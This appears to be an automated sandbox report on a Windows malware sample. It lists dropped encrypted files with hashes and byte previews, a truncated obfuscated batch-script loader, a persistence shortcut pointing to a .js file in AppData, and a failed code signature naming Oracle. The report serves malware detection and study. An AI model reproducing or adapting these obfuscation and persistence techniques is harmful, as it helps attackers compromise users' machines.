                                                Preview:oc...A.Pr;.........n.@..."w<..s...D1...........m..T#.}..}r.|.o..;d.T.0pI..a.J1.Q..r.d....Jw.-.....G...h$...}.13AW*.o}...J{.\....^.....8.N...%H..5...2S..h...j+yu....W..../$..%35E....,;.........S~.G.v...[$..~.i...4`^..)...U.KKX.l..%.=........2r.... .........}!..}~.B.Y?!.w...#..O..K.h?E..J..>4.........ox5......_.v.>..U.&_oBV.ko....(k....f...8.wZ*!....K...f,"T,)...7Z_.m.@J\.&....I......-....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....D.M.'.F...h............................kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..w.R..,P..Myn.2..t.W.....|...0....R.....9.........m.......q8.5...x..2).U.j....>.p#.~.<...(..-...8..O....<{.,..}#......I......'..V-.._..`ER....Og].%..b.q
                                                Process:C:\Users\user\Desktop\cW5i0RdQ4L.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):3831
                                                Entropy (8bit):7.946757292660395
                                                Encrypted:false
                                                SSDEEP:96:HtLdIQTWXW4M4hKF9wZpR7ezSKMaRTeBvOG03d2oF1U2pkmIgSl:HtBIQTb4ZpR0SKMaIBe3QoF1BNDSl
                                                MD5:768DB4AC22081145374C24722FCC43AD
                                                SHA1:BDB3807C1202E377300C0BA5C3583A698C37ADFD
                                                SHA-256:344B4C601FD07DF63377194621D87533A3AFA29FF6F56190C4F64B5D9FAB5B08
                                                SHA-512:D68A1343313C8F7D6EA6320FDD421A119725B2EBF71853E1726BCDDDA7E88812C2D018914AC9FA25AD4C236536813D33FB746E1B76E9860405025F78BDC1DDBD
                                                Malicious:false
                                                Preview:2u..@....qo..XWs.."1...*.{.a..4h.A<.........k?.....`n.(...I..,.....v......7........E......D.R.....!..m...=.1....#I>.,r...u..1.....n..W~q.$R..0.?..X.L...".#....cV.Zim>.. ..e....<.V:..b.x@...)Fl.....}.....()..}..u[(XD.1...zw...@....b&....8....q...>b...,.H.$.."5...."3_.Ay4.P.V..?B..`.3 .H......E.zUf......p........*..cw.W@.nx.....GP.h../...'.....B....N..sg.s/..h.K.FT...4.867uW|...h#...+..#..-..{.R........!..s.|...dZj#.&.:.D.%....q*1..t..........^P9..0:`d....9............<-W8.&.tC......]s...@#U..d........@.t...tNp..]}...c8*.\..ZAlJ,....11N;_.9.H..=....T?.H@k..<6..?..K..fA..RR...F..w].......G`...F&.,.s.........za...2.....kI.W.W..<@...3=m/4N..?.(....Yo|8.6...}........w].u.......'..}Zc.Q.L......`P..Qp|ivz....{..ag..,d/"..)m....c.4HIP....z...zd.......3..../]K.....`./g_..H.$..v...C....%?.hA.O.O.B..ka.~?dDq..e...a.).4.u....&......GX...~:.......(>f..o..R......S.:o...b..(.r.|.).[.%....d....g.Ru..~C.-.8...E.Z2.{X.M.....'.V ..j...l....../S..[6....7...U.]
                                                Process:C:\Users\user\Desktop\cW5i0RdQ4L.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):68608
                                                Entropy (8bit):7.9975055008806235
                                                Encrypted:true
                                                SSDEEP:1536:/BvokD+6XgWAVRX3efhLoR1Q28NgQhjbfa5ZU:/BRD+68VRX3eiB21GA
                                                MD5:001014C69A9062B0753718619B7E71E3
                                                SHA1:5EE78AB9158525C3F2342707C29FBC8C50DC8426
                                                SHA-256:29A6F67DE3F128B72F48CD17714C88EC0EF28771A242A4C6924087807D0F1182
                                                SHA-512:17BF97DFD5B44D40B0D662095D62E5AF2954390DE62B9791C1B1FAEA26C87E6427AA06B27BF7E53DDECDB7860D5B2B031DA87164341FD945C320236F54FCFDEA
                                                Malicious:false
                                                Preview:.....< ."/3...g.f...M.U.....\.7.7.....Z".T`..H..@/...PG.m...Q.DX.!...i.rs..Q]....^Y..r..g.]..w..`.'..Cn.g6.../.......j7...-..{.N..V........Pbs.6. 9Z.C.,rhDtT.....}$&.{O..F...:..T8.D..J.D....w.2;.jw.q.5.....6.Z...6,..l.8..".0q..UEJ..&=.&.6c...tE4.......&.v...|...M...R........s.T@.K..n.w&.5......t......U{.-.,...u...!......O>.C....l.......fU..yG._.~..R....J$#.oi....8..R.$c.F%.aQ.i%.@.N.sU.H...;3i..L...C.G.=.....v...x...|p.UJ...zg...G.)CBCik:mK".6...U3*@...Z#_.Y.m.#.}M=..>g;...&,M..b_..$yK.2..E8g..z.;..~2. ....G|.G........<.w....u.x-;..Ra...kN.d.&...;New.q<....c1....u6Kl..H....H.#]..+....CG!.2.].s/G...M..q.......6JO..,.?......P.CjD.Pr...H........?)V...........F...f-;;,N#.et...... ..S..D...O...f.>...z+.E$,...{.... .c.,5.17........z.q.Vm..H...?.[.V..X6Z.......y.0.K.'".....q.D.........Na.Yh....F.q.......+.o*..9k..I.......S.p...y..<X.TH.l aTc...LQ.....I.A^u.i\.jI....;....0}..#.ve!.t..{...\.D%..>.B5'D.....F.d_..={E.H..,..w.~zY_.$.j.EJ......UD..
                                                Process:C:\Users\user\Desktop\cW5i0RdQ4L.exe
                                                File Type:ASCII text, with very long lines (1199), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):23862
                                                Entropy (8bit):5.096137660724854
                                                Encrypted:false
                                                SSDEEP:384:Q4VFdKAGOKr0a70GNJZdjLU7xQnrSVAMqmTLQ+dsbBBTlwKns/N7UosAy+xmlYf:PVFdjKrPYCJZVU7xQrMqcM+2Rlw3N7Uy
                                                MD5:DE5800B2AD98E412AFE2A7BC93DFA639
                                                SHA1:E3D423C60E01C7C079261521B0939DA80A85649A
                                                SHA-256:67D35DB2809DA95D2DC7E4CE76800103CBC042E2F02D1CC1934A6C06E5E6737C
                                                SHA-512:E935DF1E0716EA1D5E5DCDF28E1A7CCCBAB533737F10EBF9DFF9363E457512EBC9661AE615F06FF514EC03A1F3386E45BB98C996ADF5A0FD7EEDBA2EFEC74079
                                                Malicious:false
                                                Preview:Set Adidas=T..yUeNegotiations-Chip-Fathers-Case-Dollars-Penalties-..mxrGRochester-Vice-Assign-J-Su-Minus-Dream-..ZlseMate-Taxi-Waves-Sam-Parliament-Exec-Defense-Shades-Debut-..xWnInfinite-Ft-Increasing-N-Harrison-Finding-Apache-Varies-..hgLouisiana-Orange-Bedford-Porno-Gregory-Skype-Eddie-..LOPromotion-Retreat-Reservations-Gig-Voyuer-Luxury-Julian-Physics-Mag-..KQENutrition-Tue-Promotion-Subtle-Nicaragua-..KmSPRack-Mem-Badge-Modular-Pee-Dd-..JvSoon-Permitted-Voted-Bath-Helped-Management-Nobody-..Set Foot=H..ESLfShit-Pills-Tvs-..OSGuns-General-Terry-Telephone-Barn-Stress-..VMfMarried-Schools-Tracks-Bradley-Massive-..KmWTent-Jail-..oiPci-Concerned-Exceptional-Halo-Hate-Paris-Marc-Programs-..YHDASoviet-Circulation-Economy-Ga-..BdBrush-Goods-Fallen-During-Travels-Hardly-Lg-..OLWZQuiet-Hh-Ties-Avon-Tip-Dependence-Counter-Core-..UiYGenerous-Readily-Compound-Red-Worse-Os-..Set Decades=0..uLvCoordinator-Dirty-Younger-Civilization-Signing-Og-..vPifIsolated-..cfkhPatricia-Singh-Races-Edit-Solvin
                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                File Type:ASCII text, with very long lines (1199), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):23862
                                                Entropy (8bit):5.096137660724854
                                                Encrypted:false
                                                SSDEEP:384:Q4VFdKAGOKr0a70GNJZdjLU7xQnrSVAMqmTLQ+dsbBBTlwKns/N7UosAy+xmlYf:PVFdjKrPYCJZVU7xQrMqcM+2Rlw3N7Uy
                                                MD5:DE5800B2AD98E412AFE2A7BC93DFA639
                                                SHA1:E3D423C60E01C7C079261521B0939DA80A85649A
                                                SHA-256:67D35DB2809DA95D2DC7E4CE76800103CBC042E2F02D1CC1934A6C06E5E6737C
                                                SHA-512:E935DF1E0716EA1D5E5DCDF28E1A7CCCBAB533737F10EBF9DFF9363E457512EBC9661AE615F06FF514EC03A1F3386E45BB98C996ADF5A0FD7EEDBA2EFEC74079
                                                Malicious:false
                                                Preview:Set Adidas=T..yUeNegotiations-Chip-Fathers-Case-Dollars-Penalties-..mxrGRochester-Vice-Assign-J-Su-Minus-Dream-..ZlseMate-Taxi-Waves-Sam-Parliament-Exec-Defense-Shades-Debut-..xWnInfinite-Ft-Increasing-N-Harrison-Finding-Apache-Varies-..hgLouisiana-Orange-Bedford-Porno-Gregory-Skype-Eddie-..LOPromotion-Retreat-Reservations-Gig-Voyuer-Luxury-Julian-Physics-Mag-..KQENutrition-Tue-Promotion-Subtle-Nicaragua-..KmSPRack-Mem-Badge-Modular-Pee-Dd-..JvSoon-Permitted-Voted-Bath-Helped-Management-Nobody-..Set Foot=H..ESLfShit-Pills-Tvs-..OSGuns-General-Terry-Telephone-Barn-Stress-..VMfMarried-Schools-Tracks-Bradley-Massive-..KmWTent-Jail-..oiPci-Concerned-Exceptional-Halo-Hate-Paris-Marc-Programs-..YHDASoviet-Circulation-Economy-Ga-..BdBrush-Goods-Fallen-During-Travels-Hardly-Lg-..OLWZQuiet-Hh-Ties-Avon-Tip-Dependence-Counter-Core-..UiYGenerous-Readily-Compound-Red-Worse-Os-..Set Decades=0..uLvCoordinator-Dirty-Younger-Civilization-Signing-Og-..vPifIsolated-..cfkhPatricia-Singh-Races-Edit-Solvin
                                                Process:C:\Users\user\Desktop\cW5i0RdQ4L.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):82944
                                                Entropy (8bit):7.997785532907348
                                                Encrypted:true
                                                SSDEEP:1536:+bNAgMpBbyaSuuG7cEFKWgtnMOCQZaT1BB+kEcr1Ue38UnKC8TsvVwFLcFlEOtMI:TBbyuIEFutntgrfgC5diAuOS8V
                                                MD5:D91B8B96745F7B7D81179268D4DA4B4D
                                                SHA1:B4AD21AFB4044B0C1461E1C5523D792110FB6130
                                                SHA-256:8704CB6EBE7EEF39F91CA6838C2D06EB9B21ED6E6DFDDC5F5707B8CB4A9F64F1
                                                SHA-512:8A036E1C23FF3C1921F5FAAB9BC423D7AAD509E370EA1E45C31FC84E0E868E13C862CC51D14A1708B2147DA6D6447E8D7CB2179E1D5AD8F33C29CE03C59AF85F
                                                Malicious:false
                                                Preview:oc...A.Pr;.........n.@..."w<..s...D1...........m..T#.}..}r.|.o..;d.T.0pI..a.J1.Q..r.d....Jw.-.....G...h$...}.13AW*.o}...J{.\....^.....8.N...%H..5...2S..h...j+yu....W..../$..%35E....,;.........S~.G.v...[$..~.i...4`^..)...U.KKX.l..%.=........2r.... .........}!..}~.B.Y?!.w...#..O..K.h?E..J..>4.........ox5......_.v.>..U.&_oBV.ko....(k....f...8.wZ*!....K...f,"T,)...7Z_.m.@J\.&....I......-....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....D.M.'.F...h............................kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..w.R..,P..Myn.2..t.W.....|...0....R.....9.........m.......q8.5...x..2).U.j....>.p#.~.<...(..-...8..O....<{.,..}#......I......'..V-.._..`ER....Og].%..b.q
                                                Process:C:\Users\user\Desktop\cW5i0RdQ4L.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):7800
                                                Entropy (8bit):6.237887479843994
                                                Encrypted:false
                                                SSDEEP:192:fUHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbN+G3yM:fUHAHhww+/2nlP3r1WAL3yM
                                                MD5:5A3868FBE5A6517157D7A0337C938E0A
                                                SHA1:4E8E6C526393D3D679C93D2A57B0DCA2EC0427FC
                                                SHA-256:75CB47C2BB9BEDEDD276C0008683B7E655A9E943626D2755BFA7D7E167F2B31B
                                                SHA-512:0D1C04C9D05395EBD831CA0DC94158CA32B0B5C9C839190E00EAECD572D8AB78CDB0EC07B55AFC38B8CFF1D59759A73D0AE13EF7B14A2CD8089B11FFB7E53668
                                                Malicious:false
                                                Preview:aroundaccommodategroupseverything..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.............................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\cW5i0RdQ4L.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):98304
                                                Entropy (8bit):7.998271363701794
                                                Encrypted:true
                                                SSDEEP:1536:LhAC8plpAB13tObsRlWOFw5a7qbRSIBDoJ0MiSJj9cwhXYxZvJk0EKSxImCGg7AK:LIpABRtmsRlWYw5a7KyJZcwRYxBJHE5m
                                                MD5:383CECC8DE45B96CEFDF4CE6DDBAE343
                                                SHA1:8A12728453735E74E0D633B28BDF4556D4B0AF41
                                                SHA-256:A47C770A23612063F299F22871E18642B3D4668FB58765CDC279C4C0C3A23321
                                                SHA-512:3AE0ADE7BD22E407CEA05006C12F6F2A4A94A907919F2DEE40441D019631E848E2A6C90F2CA0D16691C15A087926AAC485F57E421AF0D60FC5BBFCAC43B36412
                                                Malicious:false
                                                Preview:.8..v.@P..V...). .0*...'..b...7._O...'.734...\.C..U.t|".Gj.werl<.x......x.Q..P?.Y"}..&..U....]...Q.fm..W..q...D.X..D.= .{.....;.A.`^....[.C..[....P...".Z......$.s`<4i......M....C..L.W[F.E..d{#..h .. ....p.....j..Z* .S...&........ZY....w....4..Q.\..1..8..;............&...u.G........rN...qq!.F%Vf.8..tp..".nc.:....!./`.ZEF_....i.....O`.nK.......8..s.G..U.:...:.A.{. S>.]_e.^.i....n......=..Q.}C|z..F_gC.*.9...{.Tt.M..M*a..5...~.q.b6..d.4..f.|.<g...'I...A.f.|..=....*\...4@.... ..T[.].7..D.x>..TV.d.....w..Z..O...vy.....6.Ho....t..[.|...78X.l.8.g...M.k.+..l[...[..l*]..P.$.7.+#~.A..X..Z..B...p.......'..t..Q.Z.@....!....J.n...,6.....,.D.....I.../&.5i.....{.........Fz.................5.s....K.wL..[...:...\=+^.R...h.....m.Z......6.'!E...W...,Wm.X........+~7...5.z.^...H+o*....c..?.b.........3#._.o.>........(..}...d.S....E.&...2~...(.t.....(..Kh.a$...Oc..@.4.>.....h..yCq.(.nW.E..../.>o.=8.........j.*...9w...:l..}!8....H....x.s.;J.,..G....1..
                                                Process:C:\Users\user\Desktop\cW5i0RdQ4L.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):91136
                                                Entropy (8bit):7.997834867280466
                                                Encrypted:true
                                                SSDEEP:1536:POwYt0r7QuNT7NQyPOPSpnezwcV9xE1zaFTpX3XQwM78kIxTUU8n1V4J/:iIQu5NGPYezvTxE1upX3XQwsjUYVO/
                                                MD5:AC72A864D71E31270399396CEFA534E7
                                                SHA1:C41004BCFB507028F7D109EA2CBAB9A8BA5F4BD9
                                                SHA-256:F83C95DD15E4EB1B7F68946ECB8F1A689CC16CEBE02AE68EBC4E08E7AB467296
                                                SHA-512:7275D5A775A4FFA64AC59F0BB350582F19549A9C2FE5B0E6686D642E6BBD4B16D21E7B4358ADDEF096B539627D73CD39FE6A9D0377E817CA539C09CAFDC95180
                                                Malicious:false
                                                Preview:.d<[.@...2.M..2p......s.E..j.Q5...8.[PDw\.Jo.W.R.yt=....i..N)4...\L._. ..=V-.S?y.......q....q.6.n..D.XB.E.m.4y.kO..H{:A5Q......\5....A.4.\..q.d......v...<......j....<.-.Nn....D.E..g..4.$.K.;g.S...r..5H....&._=...JJ...\U........u..$...?...?4&.4......,...[q....A3@SrG\.S.......x...9.X.~.).X..txv#........w.......hS...{yN..[./..(?......F._.\)...P..O...G.<.T".~.{{...K....PL,+\..A.w'......EA"..A.(.....9:u..E....0m...2d..b.Mm.N..p....!.bC.t.t@...W..z.2.. ......(|...&u.9.,..`.T!...d..i..ekO..O..t7`u.y...h.-....@..}.Y.lA.`0q2..18...JW{.{Y..hf/..e.js=5..1p..............z.....{..=...7.....5..ph.".....n..Lq.;}.......@.......S.....i.7..r..+&h%...?T.....+..Y!c.>...1:.....Q.N.e...p|.H..~.M............3P|<..0.%q2|NQ.(DK.6k,.A..j....4H......~......o......y..d......\....?..J?.].u....p....'97...@j.ui..d023..(.0.....y.|....F|...`KGL.7..C.rR...|p.yp.e.'.b.EJ.s.m..!.......?Id.)6..S.{\A..........|.......-.....NCN.#b.N.......m.OD..&q.....b.....t..-.k.#.y.T...<J...
                                                Process:C:\Users\user\Desktop\cW5i0RdQ4L.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):885843
                                                Entropy (8bit):6.622038773759726
                                                Encrypted:false
                                                SSDEEP:12288:kV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:exz1JMyyzlohMf1tN70aw8501
                                                MD5:194A567844C46F20EABDCF8A7BF469DD
                                                SHA1:CCC915EEAEBEA7AD2C5550A3BA1C917B3708C469
                                                SHA-256:C2E3ADF32419B4163876794FCE4ED1F2C5D631A13AAAA955F3D3E30F1EB66A13
                                                SHA-512:BB5BE430767C176AFF3A5D3BFBE039CD67EDBA0246F3C51D302FD08D4BE19DEF43F7E6363D187AED454CD84F960DEA90746B7B6EDA525E3E4D67FA05B8BA3A00
                                                Malicious:false
                                                Preview:wL....wL....wL..=.wL....wL....wL....wL....wL.....j.^j|Xf..wL.3....xL.h.I....xL....xL....xL..=.xL... xL.l.I...$xL...(xL...,xL..50xL...4xL.......8xL...<xL...@xL..=DxL..=HxL...|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E ....@.t.j...X.I.j..Y...E .u..E..u.j.j.P....I..u..E.j.SP....I..E.+E.j..5.xL.j..u$P.E.+E.P.u .u.S.u.h..I..u... .I..........Vj.P....I..E$.G..E..G<.E .G@.E.P.7..4.I..E.+E.GD.E.+E.j.j..GH....I.Pj0.7....I.j.W..wL..\....=.wL..u.h..@.j(j.j.....I...wL....wL...wL.j..5.xL..G................_^[..]. .3........."......'....M..P....M..R...U..}..W..wL.....
                                                Process:C:\Users\user\Desktop\cW5i0RdQ4L.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):93184
                                                Entropy (8bit):7.998470680086986
                                                Encrypted:true
                                                SSDEEP:1536:FhL2bzYtAJ28r1yhcuDzkoKPze14spu84cnY6lxlbj1mCTS4Yj2VMr:H2fYtAJ2k1yWWhUzeRNYy3bjNTS4YyGr
                                                MD5:08342A0886A607763230CC9E7F9763E9
                                                SHA1:EDBEA1401B8653FED918C0E6ADBAF9E6271BEC52
                                                SHA-256:F7AD68CE94DF8B242FC3F6E9BD7814A16011214952805ED5E8E6ADEF74A27F48
                                                SHA-512:D2E319DD4E914DFB6F4399BC8527B4D1C764A02C4D5BDC8735F6CE9A46614622568692DAB02122C47B75D8B970F0418DE17FF08A8032B8F92FCF7E67D0259341
                                                Malicious:false
                                                Preview:)...(.$.[j*-3.083....=.....9Z"N.3....Xl...a..v.yaU]Ev.4...ML....I...f."9Y............t. D!).. .g.b.@....JA.]<.t...-v.i.R...E...Ue....q].s...e..W=...:...YQz}~._l{g.Y.I..K....4.l....@r?...]"....U...._a5.)...Z...K.);..u63q...E..Pu....`...).P...j.....m.....a.(...V..G.5.......2.PA..E.}....J..(#.;).1?....}"....q......Eu"..~A^.I....e.b.J...w^.L2J...b......d....l..[f.Z...T......{.....c.C.`~...k...a.N.".qc..1.h[.s.`a6..p%....'...r.....eP..S...d6H"...G.<.ly.).a.(X...V.....Z.o...6..k.{.p..m......h|]....7.v@.....R..l.K.F..E/..:..5.h..<.z..*v.......+..-e.-..o.R.xAn....-.....Qz.i.&P}.....{.p...R.Dz.4...g.={.W<?r|w..G]z.].....+...!..j1H...T.=..@..^..H.B?.s....5.8....$AS.S.Fb....K.>.{B.1.Ri.`*....n.L-.%.tt....q..+......7H.tvf>.u..k.....W........yk.......|OOv......K.(...\.K@.3H...._$.|j.7*...T.....$.g.j.)~...v.M.......I...z....e.|..'...C...J1...1%.=....4..h.^^..>...[..4.8.{.....v19.....s..%.N....29.w.y*2..!.....o..C..4.:....,c$K3&R.&.J.....:.H....
                                                Process:C:\Users\user\Desktop\cW5i0RdQ4L.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):73728
                                                Entropy (8bit):7.997368475932792
                                                Encrypted:true
                                                SSDEEP:1536:J+Q3dgxNnWvKXe/b3h7iLpHdJUzOSa6kNFZett8zMdvBG:1Wje/ZilHdJUKSa6kNLetttvBG
                                                MD5:99E977093BC7AB3360CBC1146D0EE20C
                                                SHA1:AD950626C995AF3BBE62E9AC187FA7CABDA406AD
                                                SHA-256:C1551D0D3D6C658C1B55558C4FDB2B1BE9233715B63485997C935C434BD570E7
                                                SHA-512:C148E1D0374611A19D6724EB7337A93899CFB4DB9D040F3541A47AC35947098860BCA1A9EC16E7B479E1AA98A258209E969459B2546700B462D18376B868B8C3
                                                Malicious:false
                                                Preview:.z.......z..H.j...`.+W..?y8.^.[6..H...`yG...wR...<..~.Z..Wf.2...`.....V;.............W.%<..r....G..#.........m..C&./...c...?.9..Z.b.Y.q2...Q...kT....].....N.oX!(.....a;.2...S..#.sB|.J..1. C._5.2..wMC%c=.......x....4.E.........3..,.=..S...w....tyU.A}...?.O$.....zlI..|.<.'..>...-...R..>....Q\.dR&.7..v...........B.:/.=.......p..j.W...1..t...h[.y...>V'*'.-1...J^.y&_.R.h.Pe.Q.7..Qs&.....{...m.l.r.Oq...I2.l..An........a(....Wzd.].F...r.....K]...&i/...6.C......'C.B._f..G..H...!.&#I....."#B..'....W..w...2i>a..z..V.Zx....H...F......WD!..\..m1&+Z.....FT.m.....5.d......G.@....a..)"..|D.U..&..Ll.L.C.!..0M.$.o$X4.. .a.v.G...7....1..,.uu....mo....7..b.g.W..8aQ....v+..pC.['XPc7..p..@......R...Z./..t"?.@7.u.m.C.Q...S._D.......+i5c...K...RBXU.[F.3..(..Q.|S..w..E.......3w.o=#:..8..2/.Nr.]....G...[/...O.$.X5.T;O.Q.k:h....M...CauH..koS..}.......O..-O.;:$..4..a..')W<..G.9w..B.....#.....E.C_..E...;...~.......vM..J..."=..QZ..(.8..1..Y.....|.S..b..H...b..:.`.r...
                                                Process:C:\Users\user\Desktop\cW5i0RdQ4L.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):7.997575500781217
                                                Encrypted:true
                                                SSDEEP:1536:AITtaftyMQXhoaS4SjfF7iLuiVjVK5xCUFQcCzo55:75aftCVS4SJ7Yuy4we5
                                                MD5:0B034950E941768616AF2EBA4F9D4000
                                                SHA1:A50F20A10E8DF21A1B2C1655F9F300C31D2EBED3
                                                SHA-256:D9AEA2AAD680EFCD111B992B6124E72F6BA2FEB178867D1C5F5167A21423BD4E
                                                SHA-512:EC0FDFE281CCBA186991DC872EEDA99EC0EFEC5C4F8B2CBFAAA7CEFC5248B08E071189934600A8EEDFCA804BCDF78F108778CE9A3B5F15C80BD80D77A1651965
                                                Malicious:false
                                                Preview:.Y.0. .....K.J...^.....?/]N..I....{...drOd..$..$?..^oo.&.......oC,.{y..".R...9.b0g@.$...5.0........z.P.{O<.....2:.=g0k.v.@.!...../l..=.W...-a.....".`.g....*..D'.2........y.........7.8B*...........6.j.|....vjus........es...-..C.i.1DKU?,F........c.3..?6.E......cdj6...L..m.|...]...{M..?....*h.?.B.`?.W....rc......8..(...?.j.m.;JW...j.q.%..p.W.3,%..k."..8....".074......K.cX:...f.......F..{.D}.].4......3Z.....*........2Z[...P.rz...<...:.q.dK....W+..D.-B../8=k.2..........s.p.(.7.w...<....@.l'...Ah.=.\.J.&...Z...b.....N...t..v.D=...w9....4k.-..s'.iGo..N'.e?.......>..X...9..8.... o....\..".TB....*.....e........T...u='..$..W....t.2X..|.....W......L..VR...3.y...20.zYE].=.E.JX.j.g]..8=.&..G.tH......8'......Y..`.X....h~0G.WJ'.\..*.i...w..l...].A..F.N...~Zf.a. .=Q..a.Pm.Z.e3.h.....>.pnr..`..7o...4..}f.... ..q.&.......^...........cr......&..=.j..$8.>%.8.V......q....0.E"../R.....".j.....]Y.t...@-..Dt..H9I..36Su.+..{.5}<I.l.H.JQ.........J.....DT.....z
                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" >), ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):110
                                                Entropy (8bit):4.8653120141730595
                                                Encrypted:false
                                                SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5iQztkRe7WkMuzEqtkRKfy:HRYF5yjowkn23iQzak7WkMuHaQfy
                                                MD5:523F0DBCAD516F67D396002AF1572F4A
                                                SHA1:A31D56453A86034B7D7323D618D8EB0FF62B0825
                                                SHA-256:2F470B896FF84C06F3ACBD00BE6CE3BD55BCB91AB8671841A01DC21CE6997647
                                                SHA-512:105AAFCA3B1436F92D9AF558B636E466956E04FD919F0A0F99950075EBB9D03CE315F324C036F0B93B37595518955F0C7915E8BF8B3B3B2B32E77944AFD60E1D
                                                Malicious:true
                                                Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" ..
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.977071843843171
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:cW5i0RdQ4L.exe
                                                File size:1'086'602 bytes
                                                MD5:c065ba22909fc8dbded4ea0eebb24ad5
                                                SHA1:b3d61dd7519be3d2909be9ce2d28f65ec7f9965d
                                                SHA256:9817f4d8bc1374f102196cfcb8a351abdc0563dea60f6084a7525e5ee5409b6d
                                                SHA512:b8621a86897e0da506157225ef049e92e6c6bff9837e6e2a2b55328b6931e8bd484e57dba9d2fa532728a7e35a36918a1f699cc3a9af11d26ac1fbd4fce72814
                                                SSDEEP:24576:vqJm/Xl+FIqBwq4QlGsljfzlE6J4zYfs6nScxy63:S4l+OqyLQHugVfDnS8y63
                                                TLSH:CF35238222E15865D8E62F352D7013626F38BC3B1CB94D6F93148E5CBED454B863B727
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                Icon Hash:6c64686470544c00
                                                Entrypoint:0x403883
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                Signature Valid:false
                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                Signature Validation Error:The digital signature of the object did not verify
                                                Error Number:-2146869232
                                                Not Before, Not After
                                                • 19/08/2021 01:00:00 20/08/2023 00:59:59
                                                Subject Chain
                                                • CN="Oracle America, Inc.", OU=Software Engineering, O="Oracle America, Inc.", L=Redwood City, S=California, C=US
                                                Version:3
                                                Thumbprint MD5:2876C1BECB51837D0E3DE50903D025B6
                                                Thumbprint SHA-1:940D69C0A34A1B4CFD8048488BA86F4CED60481A
                                                Thumbprint SHA-256:EE46613A38B4F486164BCE7FB23178667715617F511B364594311A1548B08EB1
                                                Serial:068BE2F53452C882F18ED41A5DD4E7A3
                                                Instruction
                                                sub esp, 000002D4h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                push 00000020h
                                                xor ebp, ebp
                                                pop esi
                                                mov dword ptr [esp+18h], ebp
                                                mov dword ptr [esp+10h], 00409268h
                                                mov dword ptr [esp+14h], ebp
                                                call dword ptr [00408030h]
                                                push 00008001h
                                                call dword ptr [004080B4h]
                                                push ebp
